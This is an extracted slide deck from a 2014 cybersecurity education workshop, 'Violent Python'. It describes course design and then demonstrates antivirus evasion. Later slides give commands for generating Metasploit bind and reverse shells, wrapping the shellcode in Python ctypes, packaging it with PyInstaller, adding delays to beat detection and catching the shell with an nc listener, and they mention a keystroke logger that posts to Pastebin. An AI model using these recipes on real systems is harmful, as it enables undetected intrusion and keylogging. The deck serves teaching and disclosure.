![Page 1: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/1.jpg)
Violent Python
Innova/ons in Cybersecurity Educa/on Workshop
June 24, 2014
![Page 2: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/2.jpg)
Bio
![Page 3: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/3.jpg)
Pedagogy
![Page 4: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/4.jpg)
Diversity in Educa/on
• Students have different previous experience, knowledge and goals
• They aren't all going to learn the same things in the same class
• My goal is NOT to make them all achieve the same proficiency
• My goal is to provide every student with material they can grasp and interes/ng challenges
![Page 5: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/5.jpg)
Beginners
• Textbook that covers the material • Online training at CodeCademy • DVDs with virtual machines ready to go • Hands-‐on projects with complete step-‐by-‐step instruc/ons
• Lab /me aSer each class with the instructor available to help
• Extensive open lab /me
![Page 6: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/6.jpg)
Average Students
• Configure their own home machines to do the projects
• Work at home, with no instructor available • Simple challenge projects without instruc/ons
![Page 7: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/7.jpg)
Advanced Students
• Advanced challenges • Online security puzzle sites • Cyber compe//ons • Following the news, independent work on cuWng-‐edge topics
![Page 8: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/8.jpg)
Independent Projects
• Students can get extra credit by – AXending other training events – In-‐class presenta/ons – Researching other tools or techniques
![Page 9: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/9.jpg)
Grading
• Must achieve a level of points to get a good grade
• Many possible combina/ons of projects can get there
• May skip the final exam
![Page 10: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/10.jpg)
![Page 11: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/11.jpg)
CNIT 124 Advanced Ethical Hacking
![Page 12: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/12.jpg)
Two Textbooks
Required Op/onal
![Page 13: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/13.jpg)
Violent Python
• Good coding principles – Excep/on handling – Modular design – Op/miza/on – Commen/ng – Flow charts
• FORGET THEM ALL
![Page 14: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/14.jpg)
Violent Python
• We are hackers • We are here to BREAK STUFF • It should be fast and easy for a complete novice to hack together a simple script to do something fun!
![Page 15: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/15.jpg)
![Page 16: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/16.jpg)
![Page 17: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/17.jpg)
![Page 18: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/18.jpg)
Projects
![Page 19: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/19.jpg)
![Page 20: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/20.jpg)
An/virus
Ungh! Good God y'all...
What is it GOOD For?
![Page 21: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/21.jpg)
![Page 22: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/22.jpg)
Mikko Hypponen Video
![Page 23: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/23.jpg)
Metasploit Payloads
![Page 24: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/24.jpg)
Metasploit
• Hundreds of payloads • The simplest one: bind_tcp • Listens on a TCP port for commands
![Page 25: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/25.jpg)
Simple Reverse Shell
• One command to produce very simple Windows EXE malware
![Page 26: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/26.jpg)
An/virus Catches It
![Page 27: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/27.jpg)
Norton v. Shell.exe
![Page 28: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/28.jpg)
Norton Iden/fies the Metasploit Packer
![Page 29: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/29.jpg)
VirusTotal: 37/49 Detec/ons
![Page 30: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/30.jpg)
How to Become 007
![Page 31: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/31.jpg)
![Page 32: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/32.jpg)
Python v. AV Round 1
shell_bind_tcp
![Page 33: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/33.jpg)
Export Metasploit Payloads to C
![Page 34: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/34.jpg)
Use Ctypes Python Library
![Page 35: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/35.jpg)
Compile it on Windows
• Install these things, in order – Python 2.7 – PyWin32 – pip-‐Win – PyInstaller
• This creates an EXE file that listens on a TCP port
![Page 36: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/36.jpg)
DEMO
• On Kali msfpayload windows/shell_bind_tcp C > foo!nano foo!
• Change top to from ctypes import *!shellcode = (!
• Change boXom to );!memorywithshell = create_string_buffer(shellcode, len(shellcode))!shell = cast(memorywithshell, CFUNCTYPE(c_void_p))!shell()!
![Page 37: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/37.jpg)
DEMO
• On Windows, in pip-‐Win: venv -c -i pyi-env-name!pyinstaller --onefile --noconsole foo!
![Page 38: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/38.jpg)
VirusTotal: 1/50 Detec/on
![Page 39: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/39.jpg)
Norton Support
• I Tweeted about this, and @NortonSupport replied
• VirusTotal is not a fair test, because real installed Norton uses Heuris/c Scanning
• @NortonSupport gave me a link for a 30-‐day trial version :)
![Page 40: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/40.jpg)
Norton Wins!
![Page 41: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/41.jpg)
Kaspersky Wins!
• Avast! doesn't detect it • Kaspersky detects it as HEUR:Trojan.Win32.Generic
![Page 42: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/42.jpg)
Python v. AV Round 2
shell_bind_tcp with a delay
![Page 43: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/43.jpg)
![Page 44: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/44.jpg)
![Page 45: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/45.jpg)
DEMO
• On Kali cp foo foo2!nano foo2!x=raw_input("Press Enter to continue")!
• On Windows, in pip-‐Win: venv -c -i pyi-env-name!pyinstaller --onefile foo2!
![Page 46: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/46.jpg)
Norton, Avast, & MSE Lose!
![Page 47: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/47.jpg)
Kaspersky Wins!
![Page 48: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/48.jpg)
Python v. AV Round 3
shell_bind_tcp in two stages no delay
![Page 49: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/49.jpg)
Other AV
• Tested on Mar 24, 2014 with a two-‐stage reverse shell and no /me delay
• Al these failed – Norton – Nod32 – Avast! – 360 Internet Security – McAfee – Kaspersky
![Page 50: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/50.jpg)
Remember Mikko?
![Page 51: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/51.jpg)
F-‐Secure Wins!
![Page 52: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/52.jpg)
AV Challenge
![Page 53: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/53.jpg)
• Posted April 3, 2014 • No reply from AV vendors, but Norton improved its detec/on aSer that – Now a delay is required
![Page 54: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/54.jpg)
Python v. AV Round 4
shell_bind_tcp with a delay
![Page 55: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/55.jpg)
INSTRUCTIONS
• On Kali msfpayload windows/shell_reverse_tcp LHOST=192.168.119.252 C > rev!nano rev!
• Change top to x=raw_input("Press Enter to continue")!from ctypes import *!shellcode = (!
• Change boXom to );!memorywithshell = create_string_buffer(shellcode, len(shellcode))!shell = cast(memorywithshell, CFUNCTYPE(c_void_p))!shell()!
![Page 56: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/56.jpg)
INSTRUCTIONS
• On Windows, in pip-‐Win: venv -c -i pyi-env-name!pyinstaller --onefile rev!
• On Kali nc –lp 4444!
![Page 57: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/57.jpg)
Norton Loses
![Page 58: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/58.jpg)
Kaspersky Wins
![Page 59: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/59.jpg)
Advanced Malware Protec/on
![Page 60: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/60.jpg)
ty @ChrisAbdalla_1 from HP ESP TippingPoint
![Page 61: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/61.jpg)
• A friend in the financial industry tested Evil.exe on a system protected by FireEye
• FireEye gives no alerts and lets it post keystrokes right to Pastebin
![Page 62: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/62.jpg)
Python Keylogger
![Page 63: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/63.jpg)
Google "Python Keylogger"
• I used this one from 4 years ago
![Page 64: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/64.jpg)
Post Keystrokes to Pastebin
![Page 65: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/65.jpg)
Problem
• Pastebin busted me for making too many pastes in a 24-‐hour period
• So I wrote my own Pastebin imita/on
![Page 66: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/66.jpg)
Kaspersky & Avast! LOSE
![Page 67: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/67.jpg)
Norton WINS!
![Page 68: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/68.jpg)
But just add a delay...
![Page 69: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/69.jpg)
F-‐Secure LOSES!
![Page 70: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/70.jpg)
PRODUCT ANNOUNCEMENT!
![Page 71: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/71.jpg)
Ultra-‐Advanced APT Tool
samsclass.info/evil.exe
![Page 72: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/72.jpg)
![Page 73: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/73.jpg)
UNSTOPPABLE
• None of these products stop it – Norton – McAfee – Kaspersky – Nod32 – F-‐Secure – Avast! – MicrosoS Security Essen/als
![Page 74: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/74.jpg)
![Page 75: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/75.jpg)
![Page 76: Innovaons(in(Cybersecurity(Educaon( Workshop((](https://reader033.vdocuments.net/reader033/viewer/2022061001/6299c0d0513fa1577239ef39/html5/thumbnails/76.jpg)